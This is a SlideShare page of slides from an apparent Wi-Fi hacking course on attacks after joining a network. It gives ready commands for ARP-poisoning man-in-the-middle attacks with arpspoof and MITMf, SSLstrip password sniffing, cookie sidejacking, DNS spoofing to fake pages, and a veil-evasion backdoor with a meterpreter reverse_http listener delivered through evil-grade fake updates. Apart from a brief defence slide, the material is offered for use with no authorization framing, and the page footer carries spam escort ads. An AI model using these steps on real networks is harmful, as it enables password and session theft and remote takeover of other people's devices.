SlideShare a Scribd company logo

04-post-connection-attacks.pdf

X
xasako1838

outfvu5rt6d754rc67urtf79

Art & Photos
1 of 21
Download to read offline
Post Connection Attacks ● All the attacks we carried out in the previous sections can be done without knowing the key to the AP, ie: without connecting to the target network. ● We saw how we can control all the connections around us, gather some information, sniff packets and crack WEP/WPA/WPA2 keys. ● In this section we shall have a look on more sophisticated attacks that can only be used after connecting to the target AP
Gathering Information ● In section 1 we saw how we can user airodump-ng to discover all the AP's around us and the clients associated with them. ● Now that we are connected to a specific AP, we can gather more detailed info about the clients connected to this AP. ● There is a number of programs that can be used to do this, we shall talk about 3 programs starting with the simplest and quickest one.
Netdiscover Netdiscover is a program that can be used to discover the connected clients to our current network, its very quick but it does not show detailed information about the clients: IP , MAC address and some times the hardware manufacturer for the client's wireless card. Usage: netdiscover -i [INTERFACE] -r [RANGE] ex: netdiscover -i wlan0 -r 192.168.1.1/24
Autoscan Autoscan is another program that can be used to discover the connected clients to our current network, its not as quick as net discover, but it shows more detailed information about the connected devices and it has a graphical user interface. You can download Autoscan from: Then open the directory where you extracted it and run http://autoscan-network.com/download/ ./AutoScan*.sh
Nmap ● Namp is a network discovery tool that can be used to gather detailed information about any client or network. ● We shall have a look on some of its uses to discover connected clients and gather information about them. ● We are going to use Zenmap – the GUI for Nmap. 1. Ping scan: Very quick – only shows connected clients. 2.Quick scan plus: Quick – shows MAC and open ports. 3.Quick scan plus: Slower then the 2 above, more detailed info. These are just sample scans, you can experiment with the scan options and see the difference between them.
Man In The Middle Attacks ARP Poisoning This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, and since we have the network key, we can read/modify/drop these packets. This allows us to launch very powerful attacks. It is very effective and dangerous because it's very hard to protect against it as it exploits the insecure way that ARP works.
Man In The Middle Attacks ARP Poisoning ARP main security issues: 1. Each ARP request/response is trusted. 2. Clients can accept responses even if they did not send a request. Requests Responses
● We can exploit theses two issues to redirect the flow of packets in the network. ● We will first send an ARP response to the client telling it that “I am the Router”, this done by telling the client that the device with the router ip address has MY MAC address. Ip:router ip MAC: HACKER MAC “I am the router” ARP Poisoning
Then we will send an ARP response to the router this time telling it that “I am the client”, this done by telling the router that the device with the client ip address has MY MAC address. Ip:client ip MAC: HACKER MAC “I am the client” ARP Poisoning
Man In The Middle Attacks ARP Poisoning This means that the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, ie:every packet that is going to/from the client will have to go through my device first. Requests Responses
ARP Poisoning arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. arpspoof -i [interface] -t [Target IP] [AP IP] Ex: arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 Echo 1 > /proc/sys/net/ipv4/ip_forward 1. Tell the target client that I am the router. 2. Tell the AP that I am the target client. 3. Enable IP forward to allow packets to flow through our device without being dropped. arpspoof -i [interface] -t [AP IP] [Target IP] Ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5
ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL mitmf –arp –spoof -gateway [GATEWAY IP] –targets [TARGET IPs] Ex: Mitmf –arp –spoof -gateway 10.20.14.1 –targets 10.20.14.206 Echo 1 > /proc/sys/net/ipv4/ip_forward
Most websites use https in their login pages, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid. SSLstrip is a tool that can be used to downgrade HTTPS requests to HTTP allowing us to sniff passwords without displaying a warning to the user. Luckily MITMf starts SSLstrip for us automatically. MITM – bypassing HTTPS
Session Hijacking What if the user uses the “remember me” feature ?? If the user uses this feature the authentication happens using the cookies and not the user and password. So instead of sniffing the password we can sniff the cookies and inject them into our browser, this will allow us to login to the user's account without using the password. apt-get install ferret-sidejack hamster ferret -i [INTERFACE]
DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request from live.com to a fake page !! > leafpad /etc/mitmf/mitmf.conf 1. Edit dns settings MITM – DNS Spoofing mitmf –arp –spoof –gateway [GATEWAY IP] –targets [TARGET IP] -i eth0 --dns Ex: mitmf –arp –spoof –gateway [10.20.14.1] –targets [10.20.14.206] -i eth0 --dns 2. Run ettercap to arp poison the target(s) and enable the dns_spoof plugin.
MITM Wireshark ● Wireshark is a network protocol analyser that is designed to help network administrators to keep track of what is happening in their network and analyse all the packets. ● Can be used whenever we are the MITM, after ARP spoofing or after starting a fake AP. ● Wireshark logs each packet that flows through the selected interface. Usage: > wireshark
Protecting against MITM attacks ● It is very difficult to protect against MITM attacks, this is due to the fact that they exploit the insecure way that ARP works. ● Using static ARP tables can protect against MITM attacks but its not practical in large networks. Even in small networks you have to configure ARP tables every time a new device connects to your network. ● We can discover ARP poisoning easily by only looking at our ARP tables. ● If the MAC address of the router changes then we have been poisoned. > arp -a
Protecting against MITM attacks ● There is also tools that would monitor our ARP table automatically and would notify us if anything suspicious happens. ● And we can use wireshark to detect ARP poisoning and other suspicious activities in the network.
1. Create a backdoor. Scenario 2 Hacking clients using a fake update 2. Listen for connections from your backdoor. > msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_http > set LPORT 5555 > set LHOST [YOUR IP] > exploit > apt-get install veil-evasion #to install veil-evasion > veil-evasion > use 8 > set LHOST [YOUR IP] > generate
Hacking clients using a fake update Using a tool called evil-grade , we can create fake updates and spoof the url that the target program uses to check for updates and get it to redirect to our machine where we have evil grade running, the target program will tell the user that there is a new update available, and when the user agrees to install the new update we will gain full access to their device.
Wi-fEye Wi-fEye is a program written in python, designed to help carry out all the attacks that we explained automatically. 1. download it from. Then you need to extract the archive, and run the following command inside its directory: Now you are ready to go ! http://wi-feye.isecur1ty.org/download.php > python install.py > python Wi-fEye.py

Recommended

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaHanaysha
 
Wifi cracking
Wifi crackingWifi cracking
Wifi crackingAbhashKumarJha
 
A REVIEW ON NMAP AND ITS FEATURES
A REVIEW ON NMAP AND ITS FEATURESA REVIEW ON NMAP AND ITS FEATURES
A REVIEW ON NMAP AND ITS FEATURESIRJET Journal
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
A Deeper Look into Network Traffic Analysis using Wireshark.pdf
A Deeper Look into Network Traffic Analysis using Wireshark.pdfA Deeper Look into Network Traffic Analysis using Wireshark.pdf
A Deeper Look into Network Traffic Analysis using Wireshark.pdfJessica Thompson
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Packet sniffing in LAN
Packet sniffing in LANPacket sniffing in LAN
Packet sniffing in LANArpit Suthar
 

Recommended

Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Firewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaFirewall arch by Tareq Hanaysha
Firewall arch by Tareq HanayshaHanaysha
 
Wifi cracking
Wifi crackingWifi cracking
Wifi crackingAbhashKumarJha
 
A REVIEW ON NMAP AND ITS FEATURES
A REVIEW ON NMAP AND ITS FEATURESA REVIEW ON NMAP AND ITS FEATURES
A REVIEW ON NMAP AND ITS FEATURESIRJET Journal
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
A Deeper Look into Network Traffic Analysis using Wireshark.pdf
A Deeper Look into Network Traffic Analysis using Wireshark.pdfA Deeper Look into Network Traffic Analysis using Wireshark.pdf
A Deeper Look into Network Traffic Analysis using Wireshark.pdfJessica Thompson
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Packet sniffing in LAN
Packet sniffing in LANPacket sniffing in LAN
Packet sniffing in LANArpit Suthar
 
Packet capturing
Packet capturingPacket capturing
Packet capturingPankajSingh1035
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRENON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTREcscpconf
 
Internet census 2012
Internet census 2012Internet census 2012
Internet census 2012Giuliano Tavaroli
 
Having Honeypot for Better Network Security Analysis
Having Honeypot for Better Network Security AnalysisHaving Honeypot for Better Network Security Analysis
Having Honeypot for Better Network Security AnalysisBangladesh Network Operators Group
 
Sniffing via dsniff
Sniffing via dsniffSniffing via dsniff
Sniffing via dsniffKshitij Tayal
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUTNahidul Kibria
 
Packet sniffers
Packet sniffersPacket sniffers
Packet sniffersKunal Thakur
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Wi fi security dedicated architectures
Wi fi security dedicated architecturesWi fi security dedicated architectures
Wi fi security dedicated architecturesparipec
 
Module 5 Sniffers
Module 5 SniffersModule 5 Sniffers
Module 5 Sniffersleminhvuong
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
Security Handbook
Security Handbook Security Handbook
Security HandbookAnthony Hasse
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdfshehbaz15
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxSuhailShaik16
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Offensive Security basics part 2
Offensive Security basics part 2Offensive Security basics part 2
Offensive Security basics part 2wharpreet
 
Snmp vulnerability assessment
Snmp vulnerability assessmentSnmp vulnerability assessment
Snmp vulnerability assessmentSupriya G
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhisoniya singh
 
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service HisarVip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisarsrsj9000
 

More Related Content

Similar to 04-post-connection-attacks.pdf

Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRENON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTREcscpconf
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Wi fi security dedicated architectures
Wi fi security dedicated architecturesWi fi security dedicated architectures
Wi fi security dedicated architecturesparipec
 
Module 5 Sniffers
Module 5 SniffersModule 5 Sniffers
Module 5 Sniffersleminhvuong
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdfshehbaz15
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxSuhailShaik16
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Offensive Security basics part 2
Offensive Security basics part 2Offensive Security basics part 2
Offensive Security basics part 2wharpreet
 
Snmp vulnerability assessment
Snmp vulnerability assessmentSnmp vulnerability assessment
Snmp vulnerability assessmentSupriya G
 

Similar to 04-post-connection-attacks.pdf (20)

Packet capturing
Packet capturingPacket capturing
Packet capturing
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptx
 
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRENON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
NON-INTRUSIVE REMOTE MONITORING OF SERVICES IN A DATA CENTRE
 
Internet census 2012
Internet census 2012Internet census 2012
Internet census 2012
 
Having Honeypot for Better Network Security Analysis
Having Honeypot for Better Network Security AnalysisHaving Honeypot for Better Network Security Analysis
Having Honeypot for Better Network Security Analysis
 
Sniffing via dsniff
Sniffing via dsniffSniffing via dsniff
Sniffing via dsniff
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Packet sniffers
Packet sniffersPacket sniffers
Packet sniffers
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Wi fi security dedicated architectures
Wi fi security dedicated architecturesWi fi security dedicated architectures
Wi fi security dedicated architectures
 
Module 5 Sniffers
Module 5 SniffersModule 5 Sniffers
Module 5 Sniffers
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13
 
Security Handbook
Security Handbook Security Handbook
Security Handbook
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdf
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
Offensive Security basics part 2
Offensive Security basics part 2Offensive Security basics part 2
Offensive Security basics part 2
 
Snmp vulnerability assessment
Snmp vulnerability assessmentSnmp vulnerability assessment
Snmp vulnerability assessment
 

Recently uploaded

FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhisoniya singh
 
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service HisarVip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisarsrsj9000
 
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call Girls
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call GirlsCall Girl Service In Dubai #$# O56521286O #$# Dubai Call Girls
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call Girlsparisharma5056
 
Roadrunner Lodge, Motel/Residence, Tucumcari NM
Roadrunner Lodge, Motel/Residence, Tucumcari NMRoadrunner Lodge, Motel/Residence, Tucumcari NM
Roadrunner Lodge, Motel/Residence, Tucumcari NMroute66connected
 
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...anilsa9823
 
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...gurkirankumar98700
 
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...home
 
Akola Call Girls #9907093804 Contact Number Escorts Service Akola
Akola Call Girls #9907093804 Contact Number Escorts Service AkolaAkola Call Girls #9907093804 Contact Number Escorts Service Akola
Akola Call Girls #9907093804 Contact Number Escorts Service Akolasrsj9000
 
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...anilsa9823
 
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...anilsa9823
 
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...akbard9823
 
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | Delhi
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | DelhiFULL ENJOY - 9953040155 Call Girls in Sangam Vihar | Delhi
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | DelhiMalviyaNagarCallGirl
 
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...akbard9823
 
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...gurkirankumar98700
 
Jeremy Casson - An Architectural and Historical Journey Around Europe
Jeremy Casson - An Architectural and Historical Journey Around EuropeJeremy Casson - An Architectural and Historical Journey Around Europe
Jeremy Casson - An Architectural and Historical Journey Around EuropeJeremy Casson
 
Editorial sephora annual report design project
Editorial sephora annual report design projectEditorial sephora annual report design project
Editorial sephora annual report design projecttbatkhuu1
 
Turn Lock Take Key Storyboard Daniel Johnson
Turn Lock Take Key Storyboard Daniel JohnsonTurn Lock Take Key Storyboard Daniel Johnson
Turn Lock Take Key Storyboard Daniel Johnsonthephillipta
 

Recently uploaded (20)

FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Vasant Kunj | Delhi
 
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service HisarVip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
Vip Hisar Call Girls #9907093804 Contact Number Escorts Service Hisar
 
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call Girls
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call GirlsCall Girl Service In Dubai #$# O56521286O #$# Dubai Call Girls
Call Girl Service In Dubai #$# O56521286O #$# Dubai Call Girls
 
Roadrunner Lodge, Motel/Residence, Tucumcari NM
Roadrunner Lodge, Motel/Residence, Tucumcari NMRoadrunner Lodge, Motel/Residence, Tucumcari NM
Roadrunner Lodge, Motel/Residence, Tucumcari NM
 
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...
Lucknow 💋 Call Girls in Lucknow ₹7.5k Pick Up & Drop With Cash Payment 892311...
 
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...
Charbagh ! (Call Girls) in Lucknow Finest Escorts Service 🥗 8923113531 🏊 Avai...
 
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...
Authentic # 00971556872006 # Hot Call Girls Service in Dubai By International...
 
Akola Call Girls #9907093804 Contact Number Escorts Service Akola
Akola Call Girls #9907093804 Contact Number Escorts Service AkolaAkola Call Girls #9907093804 Contact Number Escorts Service Akola
Akola Call Girls #9907093804 Contact Number Escorts Service Akola
 
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...
Lucknow 💋 Call Girl in Lucknow Phone No 8923113531 Elite Escort Service Avail...
 
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...
Lucknow 💋 Escorts Service Lucknow Phone No 8923113531 Elite Escort Service Av...
 
Pakistani Deira Call Girls # 00971589162217 # Pakistani Call Girls In Deira D...
Pakistani Deira Call Girls # 00971589162217 # Pakistani Call Girls In Deira D...Pakistani Deira Call Girls # 00971589162217 # Pakistani Call Girls In Deira D...
Pakistani Deira Call Girls # 00971589162217 # Pakistani Call Girls In Deira D...
 
Indian Deira Call Girls # 0522916705 # Indian Call Girls In Deira Dubai || (UAE)
Indian Deira Call Girls # 0522916705 # Indian Call Girls In Deira Dubai || (UAE)Indian Deira Call Girls # 0522916705 # Indian Call Girls In Deira Dubai || (UAE)
Indian Deira Call Girls # 0522916705 # Indian Call Girls In Deira Dubai || (UAE)
 
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...
Hazratganj / Call Girl in Lucknow - Phone 🫗 8923113531 ☛ Escorts Service at 6...
 
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | Delhi
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | DelhiFULL ENJOY - 9953040155 Call Girls in Sangam Vihar | Delhi
FULL ENJOY - 9953040155 Call Girls in Sangam Vihar | Delhi
 
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...
Hazratganj ] (Call Girls) in Lucknow - 450+ Call Girl Cash Payment 🧄 89231135...
 
Bur Dubai Call Girls # 971504361175 # Call Girls In Bur Dubai || (UAE)
Bur Dubai Call Girls # 971504361175 # Call Girls In Bur Dubai || (UAE)Bur Dubai Call Girls # 971504361175 # Call Girls In Bur Dubai || (UAE)
Bur Dubai Call Girls # 971504361175 # Call Girls In Bur Dubai || (UAE)
 
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...
Gomti Nagar & High Profile Call Girls in Lucknow (Adult Only) 8923113531 Esc...
 
Jeremy Casson - An Architectural and Historical Journey Around Europe
Jeremy Casson - An Architectural and Historical Journey Around EuropeJeremy Casson - An Architectural and Historical Journey Around Europe
Jeremy Casson - An Architectural and Historical Journey Around Europe
 
Editorial sephora annual report design project
Editorial sephora annual report design projectEditorial sephora annual report design project
Editorial sephora annual report design project
 
Turn Lock Take Key Storyboard Daniel Johnson
Turn Lock Take Key Storyboard Daniel JohnsonTurn Lock Take Key Storyboard Daniel Johnson
Turn Lock Take Key Storyboard Daniel Johnson
 

04-post-connection-attacks.pdf

  • 1. Post Connection Attacks ● All the attacks we carried out in the previous sections can be done without knowing the key to the AP, ie: without connecting to the target network. ● We saw how we can control all the connections around us, gather some information, sniff packets and crack WEP/WPA/WPA2 keys. ● In this section we shall have a look on more sophisticated attacks that can only be used after connecting to the target AP
  • 2. Gathering Information ● In section 1 we saw how we can user airodump-ng to discover all the AP's around us and the clients associated with them. ● Now that we are connected to a specific AP, we can gather more detailed info about the clients connected to this AP. ● There is a number of programs that can be used to do this, we shall talk about 3 programs starting with the simplest and quickest one.
  • 3. Netdiscover Netdiscover is a program that can be used to discover the connected clients to our current network, its very quick but it does not show detailed information about the clients: IP , MAC address and some times the hardware manufacturer for the client's wireless card. Usage: netdiscover -i [INTERFACE] -r [RANGE] ex: netdiscover -i wlan0 -r 192.168.1.1/24
  • 4. Autoscan Autoscan is another program that can be used to discover the connected clients to our current network, its not as quick as net discover, but it shows more detailed information about the connected devices and it has a graphical user interface. You can download Autoscan from: Then open the directory where you extracted it and run http://autoscan-network.com/download/ ./AutoScan*.sh
  • 5. Nmap ● Namp is a network discovery tool that can be used to gather detailed information about any client or network. ● We shall have a look on some of its uses to discover connected clients and gather information about them. ● We are going to use Zenmap – the GUI for Nmap. 1. Ping scan: Very quick – only shows connected clients. 2.Quick scan plus: Quick – shows MAC and open ports. 3.Quick scan plus: Slower then the 2 above, more detailed info. These are just sample scans, you can experiment with the scan options and see the difference between them.
  • 6. Man In The Middle Attacks ARP Poisoning This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, and since we have the network key, we can read/modify/drop these packets. This allows us to launch very powerful attacks. It is very effective and dangerous because it's very hard to protect against it as it exploits the insecure way that ARP works.
